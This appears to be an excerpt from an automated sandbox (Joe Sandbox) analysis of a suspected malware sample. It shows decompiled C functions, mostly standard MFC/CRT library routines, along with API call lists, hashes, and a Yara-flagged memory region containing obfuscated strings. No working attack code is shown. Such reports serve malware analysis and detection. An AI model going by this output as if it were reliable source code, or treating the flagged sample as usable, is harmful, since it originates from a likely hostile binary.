                  				_t18 = E0040D6F3(_t24, "UnregisterPerUser");
                  				if(_t18 == 0) {
                  					L19:
                  					 *((intOrPtr*)(_t47 + 0x14)) = 6;
                  					 *((intOrPtr*)(_t47 + 0x10)) = 1;
                  					return _t18;
                  				}
                  				_t18 = E0040D6F3(_t24, "UnregserverPerUser");
                  				_pop(_t41);
                  				if(_t18 == 0) {
                  					goto L19;
                  				}
                  				if(lstrcmpA(_t24, "dde") == 0) {
                  					_t23 = E00423E10(_t41, _t19);
                  					 *((intOrPtr*)(_t47 + 0x14)) = 4;
                  					return _t23;
                  				}
                  				_t20 = E0040D6F3(_t24, "Embedding");
                  				_pop(_t43);
                  				if(_t20 == 0) {
                  					_t22 = E00423E10(_t43, _t20);
                  					 *((intOrPtr*)(_t47 + 8)) = 1;
                  					L16:
                  					 *(_t47 + 4) =  *(_t47 + 4) & 0x00000000;
                  					return _t22;
                  				}
                  				_t21 = E0040D6F3(_t24, "Automation");
                  				_pop(_t45);
                  				if(_t21 == 0) {
                  					_t22 = E00423E10(_t45, _t21);
                  					 *((intOrPtr*)(_t47 + 0xc)) = 1;
                  					goto L16;
                  				}
                  				return _t21;
                  			}

                  APIs
                  • lstrcmpA.KERNEL32(?,00451CF8), ref: 0041516A
                  • lstrcmpA.KERNEL32(?,00451CF4), ref: 00415182
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: lstrcmp
                  • String ID: Automation$Embedding$Register$RegisterPerUser$Regserver$RegserverPerUser$Unregister$UnregisterPerUser$Unregserver$UnregserverPerUser$dde
                  • API String ID: 1534048567-3876351261
                  • Opcode ID: 9d3d5de904741c47644dff931f87209fb8385c58037a0fa5dc1866a977703a3c
                  • Instruction ID: bacbe481972acab002e41af3f2ad9a35167e3d19faef8bf490c2dd1adb14a177
                  • Opcode Fuzzy Hash: 9d3d5de904741c47644dff931f87209fb8385c58037a0fa5dc1866a977703a3c
                  • Instruction Fuzzy Hash: C231C373544F02A5E2246E76ED02BD722DC6B5176AF20081FF806A66C3DFFED588496C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00416443(intOrPtr __ecx, void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
                  				signed int _v8;
                  				void* _v12;
                  				void* _v16;
                  				signed int _v24;
                  				intOrPtr _v28;
                  				char _v32;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t43;
                  				void* _t59;
                  				void* _t60;
                  				intOrPtr _t64;
                  
                  				_t59 = __edx;
                  				_t64 = __ecx;
                  				_t69 =  *((intOrPtr*)(__ecx + 0x2c));
                  				if( *((intOrPtr*)(__ecx + 0x2c)) != 0) {
                  					E00406436(0, __ecx, _t60, __ecx, _t69);
                  				}
                  				E00431160(_t60,  &_v32, 0, 0x1c);
                  				_v32 = E0041EDAB(0, _t60, _t64, _t69);
                  				_v28 = _t64;
                  				_v16 = CreateEventA(0, 1, 0, 0);
                  				_v12 = CreateEventA(0, 1, 0, 0);
                  				_t37 = _a4;
                  				_v24 = _a4;
                  				if(_v16 == 0) {
                  					L12:
                  					__eflags = _v12;
                  					if(_v12 == 0) {
                  						goto L14;
                  					}
                  					goto L13;
                  				} else {
                  					if(_v12 == 0) {
                  						CloseHandle(_v16);
                  						goto L12;
                  					}
                  					_t43 = E00433E25(_t59, _t64, _a12, _a8, E00416327,  &_v32, _t37 | 0x00000004, _t64 + 0x30);
                  					 *(_t64 + 0x2c) = _t43;
                  					if(_t43 != 0) {
                  						ResumeThread(_t43);
                  						WaitForSingleObject(_v16, 0xffffffff);
                  						CloseHandle(_v16);
                  						__eflags = _a4 & 0x00000004;
                  						if((_a4 & 0x00000004) != 0) {
                  							SuspendThread( *(_t64 + 0x2c));
                  						}
                  						__eflags = _v8;
                  						if(_v8 == 0) {
                  							SetEvent(_v12);
                  							return 1;
                  						} else {
                  							WaitForSingleObject( *(_t64 + 0x2c), 0xffffffff);
                  							CloseHandle( *(_t64 + 0x2c));
                  							 *(_t64 + 0x2c) = 0;
                  							L13:
                  							CloseHandle(_v12);
                  							L14:
                  							return 0;
                  						}
                  					}
                  					CloseHandle(_v16);
                  					CloseHandle(_v12);
                  					goto L14;
                  				}
                  			}


















                  APIs
                  • _memset.LIBCMT ref: 00416463
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00416481
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0041648B
                  • CloseHandle.KERNEL32(?), ref: 004164D9
                  • CloseHandle.KERNEL32(?), ref: 004164DE
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • ResumeThread.KERNEL32(00000000), ref: 004164E3
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004164EE
                  • CloseHandle.KERNEL32(?), ref: 004164FD
                  • SuspendThread.KERNEL32(?), ref: 00416508
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00416518
                  • CloseHandle.KERNEL32(?), ref: 00416521
                  • SetEvent.KERNEL32(00000004), ref: 0041652B
                  • CloseHandle.KERNEL32(?), ref: 00416543
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseHandle$Event$CreateObjectSingleThreadWait$Exception@8H_prolog3ResumeSuspendThrow_memset
                  • String ID:
                  • API String ID: 2577798173-0
                  • Opcode ID: 2b12f44261b0e700d1cb254170418ee1016ff70137ee5d9583ddda4daff69bfd
                  • Instruction ID: 0ba4b3701773fc9ac83d28f7e8eab003c92724f4a67e4e5f2fa9819084e5fd14
                  • Opcode Fuzzy Hash: 2b12f44261b0e700d1cb254170418ee1016ff70137ee5d9583ddda4daff69bfd
                  • Instruction Fuzzy Hash: 24316E72C00209BFDB11AFA5DC848AEBBBAFF48354F11857AF911A2160D7359A819F58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E00436018(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				struct HINSTANCE__* _t23;
                  				intOrPtr _t28;
                  				intOrPtr _t32;
                  				intOrPtr _t45;
                  				void* _t46;
                  
                  				_t35 = __ebx;
                  				_push(0xc);
                  				_push(0x45e180);
                  				E00431818(__ebx, __edi, __esi);
                  				_t44 = L"KERNEL32.DLL";
                  				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                  				if(_t23 == 0) {
                  					_t23 = E0043392F(_t44);
                  				}
                  				 *(_t46 - 0x1c) = _t23;
                  				_t45 =  *((intOrPtr*)(_t46 + 8));
                  				 *((intOrPtr*)(_t45 + 0x5c)) = 0x456080;
                  				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                  				if(_t23 != 0) {
                  					_t35 = GetProcAddress;
                  					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                  					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                  				}
                  				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                  				 *((char*)(_t45 + 0xc8)) = 0x43;
                  				 *((char*)(_t45 + 0x14b)) = 0x43;
                  				 *(_t45 + 0x68) = 0x463620;
                  				E0043A0BF(_t35, 0xd);
                  				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                  				InterlockedIncrement( *(_t45 + 0x68));
                  				 *(_t46 - 4) = 0xfffffffe;
                  				E004360ED();
                  				E0043A0BF(_t35, 0xc);
                  				 *(_t46 - 4) = 1;
                  				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                  				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                  				if(_t28 == 0) {
                  					_t32 =  *0x463c28; // 0x25e10f8
                  					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                  				}
                  				E00439086( *((intOrPtr*)(_t45 + 0x6c)));
                  				 *(_t46 - 4) = 0xfffffffe;
                  				return E0043185D(E004360F6());
                  			}









                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0045E180,0000000C,00436153,00000000,00000000,?,?,18EAB29F), ref: 0043602A
                  • __crt_waiting_on_module_handle.LIBCMT ref: 00436035
                    • Part of subcall function 0043392F: Sleep.KERNEL32(000003E8,00000000,?,00435F3E,KERNEL32.DLL,?,00435FAA,?,?,18EAB29F), ref: 0043393B
                    • Part of subcall function 0043392F: GetModuleHandleW.KERNEL32(?,?,00435F3E,KERNEL32.DLL,?,00435FAA,?,?,18EAB29F), ref: 00433944
                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0043605E
                  • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0043606E
                  • __lock.LIBCMT ref: 00436090
                  • InterlockedIncrement.KERNEL32(00463620), ref: 0043609D
                  • __lock.LIBCMT ref: 004360B1
                  • ___addlocaleref.LIBCMT ref: 004360CF
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                  • String ID: 6F$DecodePointer$EncodePointer$KERNEL32.DLL
                  • API String ID: 1028249917-1974163033
                  • Opcode ID: 2938ef12c040f176a8b5a28532755f9678e071b691cd56c04785de8a37628ebe
                  • Instruction ID: e4dbea44d3e701bfa2a05fd5f39e00ef826fe1f2e1bb3cd6cc1662b80f67c0e6
                  • Opcode Fuzzy Hash: 2938ef12c040f176a8b5a28532755f9678e071b691cd56c04785de8a37628ebe
                  • Instruction Fuzzy Hash: 4311A271940B01AAD724EF76D802B5EBBF0EF09315F10952FE899973A1CB789A448F1D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 84%
                  			E0042D0D6(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
                  				signed int _v8;
                  				struct tagLOGFONTA _v68;
                  				struct tagSIZE _v76;
                  				struct tagSIZE _v84;
                  				void* _v88;
                  				int _v92;
                  				int _v96;
                  				struct tagTEXTMETRICA _v152;
                  				void* __esi;
                  				signed int _t65;
                  				long _t73;
                  				void* _t82;
                  				signed int _t86;
                  				signed int _t87;
                  				void* _t112;
                  				int _t116;
                  				void* _t118;
                  				void* _t121;
                  				void** _t122;
                  				signed int _t124;
                  				signed int _t126;
                  
                  				_t113 = __edi;
                  				_t112 = __edx;
                  				_t104 = __ebx;
                  				_t124 = _t126;
                  				_t65 =  *0x463404; // 0x18eab29f
                  				_t66 = _t65 ^ _t124;
                  				_v8 = _t65 ^ _t124;
                  				_t120 = __ecx;
                  				if( *(__ecx + 8) != 0) {
                  					_t66 =  *(__ecx + 0x2c);
                  					if(_t66 != 0) {
                  						if( *((intOrPtr*)(__ecx + 4)) != 0) {
                  							_push(__ebx);
                  							_push(__edi);
                  							GetObjectA(_t66, 0x3c,  &_v68);
                  							GetTextFaceA( *(__ecx + 8), 0x20,  &(_v68.lfFaceName));
                  							GetTextMetricsA( *(__ecx + 8),  &_v152);
                  							_t73 = _v152.tmHeight;
                  							if(_t73 >= 0) {
                  								_v68.lfHeight = _v152.tmInternalLeading - _t73;
                  							} else {
                  								_v68.lfHeight = _t73;
                  							}
                  							_v68.lfWidth = _v152.tmAveCharWidth;
                  							_v68.lfWeight = _v152.tmWeight;
                  							_v68.lfItalic = _v152.tmItalic;
                  							_v68.lfUnderline = _v152.tmUnderlined;
                  							_v68.lfStrikeOut = _v152.tmStruckOut;
                  							_v68.lfCharSet = _v152.tmCharSet;
                  							_v68.lfPitchAndFamily = _v152.tmPitchAndFamily;
                  							_t82 = CreateFontIndirectA( &_v68);
                  							_v88 = _t82;
                  							SelectObject( *(_t120 + 4), _t82);
                  							GetTextMetricsA( *(_t120 + 4),  &_v152);
                  							_t86 = _v152.tmHeight;
                  							_t116 =  ~(_v68.lfHeight);
                  							if(_t86 >= 0) {
                  								_t87 = _t86 - _v152.tmInternalLeading;
                  							} else {
                  								_t87 =  ~_t86;
                  							}
                  							_v92 = _t87;
                  							GetWindowExtEx( *(_t120 + 4),  &_v76);
                  							GetViewportExtEx( *(_t120 + 4),  &_v84);
                  							if(_v76.cy < 0) {
                  								_v76.cy =  ~(_v76.cy);
                  							}
                  							if(_v84.cy < 0) {
                  								_v84.cy =  ~(_v84.cy);
                  							}
                  							_v96 = MulDiv(_t116, _v84.cy, _v76.cy);
                  							if(_v96 >= MulDiv(_v92, _v84.cy, _v76.cy)) {
                  								_t118 = _v88;
                  							} else {
                  								_v68.lfPitchAndFamily = (_v68.lfPitchAndFamily & 0 | (_v68.lfPitchAndFamily & 0x000000f0) != 0x00000050) - 0x00000001 & 0x00000050;
                  								_v68.lfFaceName = 0;
                  								_t118 = CreateFontIndirectA( &_v68);
                  								SelectObject( *(_t120 + 4), _t118);
                  								DeleteObject(_v88);
                  							}
                  							_t122 = _t120 + 0x28;
                  							_t66 = E0041FCF2(_t122);
                  							 *_t122 = _t118;
                  							_pop(_t113);
                  							_pop(_t104);
                  						}
                  					} else {
                  						_push(0xe);
                  						_t66 =  *((intOrPtr*)( *__ecx + 0x24))();
                  					}
                  				}
                  				_pop(_t121);
                  				return E00430650(_t66, _t104, _v8 ^ _t124, _t112, _t113, _t121);
                  			}

























                  APIs
                  • GetObjectA.GDI32(?,0000003C,?), ref: 0042D11E
                  • GetTextFaceA.GDI32(00000000,00000020,?), ref: 0042D12D
                  • GetTextMetricsA.GDI32(00000000,?), ref: 0042D143
                  • CreateFontIndirectA.GDI32(?), ref: 0042D193
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D19C
                  • GetTextMetricsA.GDI32(00000000,?), ref: 0042D1AC
                  • GetWindowExtEx.GDI32(00000000,?), ref: 0042D1D1
                  • GetViewportExtEx.GDI32(00000000,?), ref: 0042D1DE
                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0042D203
                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0042D211
                  • CreateFontIndirectA.GDI32(?), ref: 0042D231
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D239
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ObjectText$CreateFontIndirectMetricsSelect$FaceViewportWindow
                  • String ID:
                  • API String ID: 4277312469-0
                  • Opcode ID: 46c90baf14463cde0e743273ea8f5b1da7676210bc4cae94f4770b9c8b14f1b6
                  • Instruction ID: 782ba5df95f801dfe7796d8664102e7f783a38d20a5401a22cb6488579e2bdbf
                  • Opcode Fuzzy Hash: 46c90baf14463cde0e743273ea8f5b1da7676210bc4cae94f4770b9c8b14f1b6
                  • Instruction Fuzzy Hash: 70513235A00268DFDF118FA5DD45AEEBBB9FF59300F10406AE859A6211D734AD46CF28
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E004489F0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t18;
                  				void* _t23;
                  				void* _t39;
                  				intOrPtr _t43;
                  				void* _t44;
                  
                  				_t39 = __edx;
                  				_t29 = __ebx;
                  				_push(0x14);
                  				E00431A9B(E0044CC9D, __ebx, __edi, __esi);
                  				E00448F7B(_t44 - 0x14, 0);
                  				_t43 =  *0x46743c; // 0x25e10d8
                  				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                  				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
                  				_t18 = E00447826( *((intOrPtr*)(_t44 + 8)), E00447732(0x467554));
                  				_t41 = _t18;
                  				if(_t18 == 0) {
                  					if(_t43 == 0) {
                  						_push( *((intOrPtr*)(_t44 + 8)));
                  						_push(_t44 - 0x10);
                  						_t23 = E004485F1(__ebx, _t41, _t43, __eflags);
                  						__eflags = _t23 - 0xffffffff;
                  						if(_t23 == 0xffffffff) {
                  							E00430C66(_t44 - 0x20, "bad cast");
                  							E00430CF4(_t44 - 0x20, 0x45e790);
                  						}
                  						_t41 =  *((intOrPtr*)(_t44 - 0x10));
                  						 *0x46743c =  *((intOrPtr*)(_t44 - 0x10));
                  						E00447769( *((intOrPtr*)(_t44 - 0x10)));
                  						E0044911C(_t29, _t39, _t41, _t43, _t41);
                  					} else {
                  						_t41 = _t43;
                  					}
                  				}
                  				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                  				E00448FA3(_t44 - 0x14);
                  				return E00431B73(_t41);
                  			}









                  APIs
                  • __EH_prolog3.LIBCMT ref: 004489F7
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00448A01
                  • int.LIBCPMT ref: 00448A18
                    • Part of subcall function 00447732: std::_Lockit::_Lockit.LIBCPMT ref: 00447745
                  • std::locale::_Getfacet.LIBCPMT ref: 00448A21
                  • ctype.LIBCPMT ref: 00448A3B
                  • std::bad_exception::bad_exception.LIBCMT ref: 00448A4F
                  • __CxxThrowException@8.LIBCMT ref: 00448A5D
                  • std::locale::facet::_Incref.LIBCPMT ref: 00448A6D
                  • std::locale::facet::facet_Register.LIBCPMT ref: 00448A73
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                  • String ID: TuF$bad cast
                  • API String ID: 2535038987-1496521168
                  • Opcode ID: d1a9c288e7aec9ff4f5bf7d24857f49445e3ddbaba58f23c9a0fa4d8bebe908b
                  • Instruction ID: ff64b05e2f82beb86cc65c12f0f5b39e1603df0fa0b9ef5944976ff18bc40764
                  • Opcode Fuzzy Hash: d1a9c288e7aec9ff4f5bf7d24857f49445e3ddbaba58f23c9a0fa4d8bebe908b
                  • Instruction Fuzzy Hash: 5501A13190421597EF05FBA188829BE72356F44328F54021FF1107B2E1DF7C9A06DB9D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 023E8CD0
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ($}81$(&S$10Jj$7x$GE$WBt$[I7g$x|
                  • API String ID: 1029625771-105190942
                  • Opcode ID: 2558f5100f10b554e5f19f9bf731a2e9ca480479b0700c3848657a42836c3e9e
                  • Instruction ID: 6c5bc46b1d49cfdb670d5b25e525ecf93211d1231bfb9d4c019ee1094f636d90
                  • Opcode Fuzzy Hash: 2558f5100f10b554e5f19f9bf731a2e9ca480479b0700c3848657a42836c3e9e
                  • Instruction Fuzzy Hash: DB32A5B4856369CBEB61DF829A897CDBB74BB11304F6086C8D2593B214CB750B86CF85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E0042408E(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t131;
                  				intOrPtr _t195;
                  				intOrPtr* _t223;
                  				void* _t226;
                  				intOrPtr _t229;
                  
                  				_push(0x38);
                  				E00431A9B(E0044C068, __ebx, __edi, __esi);
                  				_t223 = __ecx;
                  				 *((intOrPtr*)(_t226 - 0x30)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x34)) = 0x452b4c;
                  				 *(_t226 - 4) = 0;
                  				 *((intOrPtr*)(_t226 - 0x28)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x2c)) = 0x452b4c;
                  				 *((intOrPtr*)(_t226 - 0x20)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x24)) = 0x452b4c;
                  				 *(_t226 - 4) = 2;
                  				E00423A90(_t226 - 0x2c,  *(_t226 + 8));
                  				E00413342(_t226 - 0x44,  *(_t226 + 8));
                  				InflateRect(_t226 - 0x44,  ~( *(_t226 + 0xc)),  ~( *(_t226 + 0x10)));
                  				IntersectRect(_t226 - 0x44, _t226 - 0x44,  *(_t226 + 8));
                  				E00423A90(_t226 - 0x24, _t226 - 0x44);
                  				E00423059(0, _t226 - 0x34, _t223, CreateRectRgn(0, 0, 0, 0));
                  				E00423F00(_t226 - 0x34, _t226 - 0x2c, _t226 - 0x24, 3);
                  				_t228 =  *((intOrPtr*)(_t226 + 0x20));
                  				if( *((intOrPtr*)(_t226 + 0x20)) == 0) {
                  					 *((intOrPtr*)(_t226 + 0x20)) = E00423F2F(0, _t223, 0x452b4c, _t228);
                  				}
                  				_t195 =  *((intOrPtr*)(_t226 + 0x20));
                  				_t229 = _t195;
                  				_t230 = _t229 == 0;
                  				if(_t229 == 0) {
                  					E00406436(0, _t195, _t223, 0x452b4c, _t230);
                  				}
                  				if( *((intOrPtr*)(_t226 + 0x24)) == 0) {
                  					 *((intOrPtr*)(_t226 + 0x24)) = _t195;
                  				}
                  				 *((intOrPtr*)(_t226 - 0x18)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x1c)) = 0x452b4c;
                  				 *((intOrPtr*)(_t226 - 0x10)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x14)) = 0x452b4c;
                  				 *(_t226 - 4) = 4;
                  				if( *(_t226 + 0x14) != 0) {
                  					E00423059(0, _t226 - 0x1c, _t223, CreateRectRgn(0, 0, 0, 0));
                  					E00423EE0(_t226 - 0x2c,  *(_t226 + 0x14));
                  					CopyRect(_t226 - 0x44,  *(_t226 + 0x14));
                  					InflateRect(_t226 - 0x44,  ~( *(_t226 + 0x18)),  ~( *(_t226 + 0x1c)));
                  					IntersectRect(_t226 - 0x44, _t226 - 0x44,  *(_t226 + 0x14));
                  					E00423EE0(_t226 - 0x24, _t226 - 0x44);
                  					E00423F00(_t226 - 0x1c, _t226 - 0x2c, _t226 - 0x24, 3);
                  					if( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x24)) + 4))) {
                  						E00423059(0, _t226 - 0x14, _t223, CreateRectRgn(0, 0, 0, 0));
                  						E00423F00(_t226 - 0x14, _t226 - 0x1c, _t226 - 0x34, 3);
                  					}
                  				}
                  				if( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x24)) + 4)) &&  *(_t226 + 0x14) != 0) {
                  					E00422B77(_t223, _t226 - 0x1c);
                  					 *((intOrPtr*)( *_t223 + 0x50))(_t226 - 0x44);
                  					 *(_t226 + 0x14) = E00423194(_t223,  *((intOrPtr*)(_t226 + 0x24)));
                  					E0041B463(_t223,  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x40)),  *((intOrPtr*)(_t226 - 0x3c)) -  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x38)) -  *((intOrPtr*)(_t226 - 0x40)), 0x5a0049);
                  					E00423194(_t223,  *(_t226 + 0x14));
                  				}
                  				_t131 = _t226 - 0x14;
                  				if( *((intOrPtr*)(_t226 - 0x10)) == 0) {
                  					_t131 = _t226 - 0x34;
                  				}
                  				E00422B77(_t223, _t131);
                  				 *((intOrPtr*)( *_t223 + 0x50))(_t226 - 0x44);
                  				 *(_t226 + 0x14) = E00423194(_t223,  *((intOrPtr*)(_t226 + 0x20)));
                  				E0041B463(_t223,  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x40)),  *((intOrPtr*)(_t226 - 0x3c)) -  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x38)) -  *((intOrPtr*)(_t226 - 0x40)), 0x5a0049);
                  				_t238 =  *(_t226 + 0x14);
                  				if( *(_t226 + 0x14) != 0) {
                  					E00423194(_t223,  *(_t226 + 0x14));
                  				}
                  				E00422B77(_t223, 0);
                  				 *(_t226 - 4) = 3;
                  				 *((intOrPtr*)(_t226 - 0x14)) = 0x452b4c;
                  				E0040ADD4(0, _t226 - 0x14, _t223, 0x452b4c, _t238);
                  				 *(_t226 - 4) = 2;
                  				 *((intOrPtr*)(_t226 - 0x1c)) = 0x452b4c;
                  				E0040ADD4(0, _t226 - 0x1c, _t223, 0x452b4c, _t238);
                  				 *(_t226 - 4) = 1;
                  				 *((intOrPtr*)(_t226 - 0x24)) = 0x452b4c;
                  				E0040ADD4(0, _t226 - 0x24, _t223, 0x452b4c, _t238);
                  				 *(_t226 - 4) = 0;
                  				 *((intOrPtr*)(_t226 - 0x2c)) = 0x452b4c;
                  				E0040ADD4(0, _t226 - 0x2c, _t223, 0x452b4c, _t238);
                  				 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
                  				 *((intOrPtr*)(_t226 - 0x34)) = 0x452b4c;
                  				return E00431B73(E0040ADD4(0, _t226 - 0x34, _t223, 0x452b4c,  *(_t226 - 4)));
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00424095
                    • Part of subcall function 00423A90: CreateRectRgnIndirect.GDI32(?), ref: 00423A9B
                    • Part of subcall function 00413342: CopyRect.USER32 ref: 0041334E
                  • InflateRect.USER32(?,?,?), ref: 004240E2
                  • IntersectRect.USER32 ref: 004240F0
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00424106
                    • Part of subcall function 00423F00: CombineRgn.GDI32(?,?,?,?), ref: 00423F25
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0042416C
                  • CopyRect.USER32 ref: 0042418D
                  • InflateRect.USER32(?,?,?), ref: 004241A3
                  • IntersectRect.USER32 ref: 004241B1
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 004241E7
                    • Part of subcall function 00423F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 00423F77
                    • Part of subcall function 00423F2F: CreatePatternBrush.GDI32(00000000), ref: 00423F84
                    • Part of subcall function 00423F2F: DeleteObject.GDI32(00000000), ref: 00423F90
                    • Part of subcall function 0041B463: PatBlt.GDI32(?,?,?,?,?,?), ref: 0041B47A
                    • Part of subcall function 00423194: SelectObject.GDI32(?,00000000), ref: 004231BA
                    • Part of subcall function 00423194: SelectObject.GDI32(?,?), ref: 004231D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Create$Object$CopyInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3IndirectPattern
                  • String ID: L+E
                  • API String ID: 714730959-4127712704
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E0041A027(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				int _t35;
                  				int _t36;
                  				intOrPtr* _t56;
